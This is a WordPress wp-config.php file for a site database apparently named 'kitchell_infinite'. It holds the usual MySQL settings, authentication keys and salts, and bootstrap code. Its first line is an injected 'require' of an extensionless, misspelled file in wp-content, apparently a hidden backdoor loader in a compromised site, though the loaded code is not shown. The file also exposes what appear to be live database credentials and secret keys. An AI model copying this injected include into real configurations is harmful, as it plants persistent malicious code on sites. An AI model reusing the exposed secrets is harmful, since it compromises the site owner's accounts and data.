<?php require('wp-content/coment');
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'kitchell_infinite' );

/** MySQL database username */
define( 'DB_USER', 'kitchell_sbohn' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Bush-wood!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'mpgdftrgbh8ewgjzjwncskx7kve4nuqeaf1w5zz6amgpltxrskv7x7oiof5fonvw' );
define( 'SECURE_AUTH_KEY',  'kfypu1qunooixlmqfgmh19bhfehmhswudzagmr0tr66mwsy7jfammiwkr5iefur7' );
define( 'LOGGED_IN_KEY',    'gmek0pujahy6tjaxsknlyfke2dwfny2or1bck1gqhsk96ygd1rlxeam5ptdlzmsi' );
define( 'NONCE_KEY',        'o6w5c6vriwiaa3bn4y8lmeqrb1dhr8rtqfr1wzryhv0mibw1x86cglf3ayt4zork' );
define( 'AUTH_SALT',        'm0gwpuj9mg7en1nqoqxduydqhnca9hstfipovxhykzzrrndsaxk1gxmhowzwbrrf' );
define( 'SECURE_AUTH_SALT', 'rtceufiyz9djno0i7p2ws7pzgvgmn1ytpwjpmbhfnp3vfx5sniy3imoly5i4jnv6' );
define( 'LOGGED_IN_SALT',   'k0ob3u5nkrqinudeaxrni6ctrygrlejliju10ovpiz95zcs89ztp1ixhyttb3lmj' );
define( 'NONCE_SALT',       'qshjxvtpuev4bumzck7iozocl4lwnib00chdixj4wtrxcneczxftyuquocvhabvc' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wpx0_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
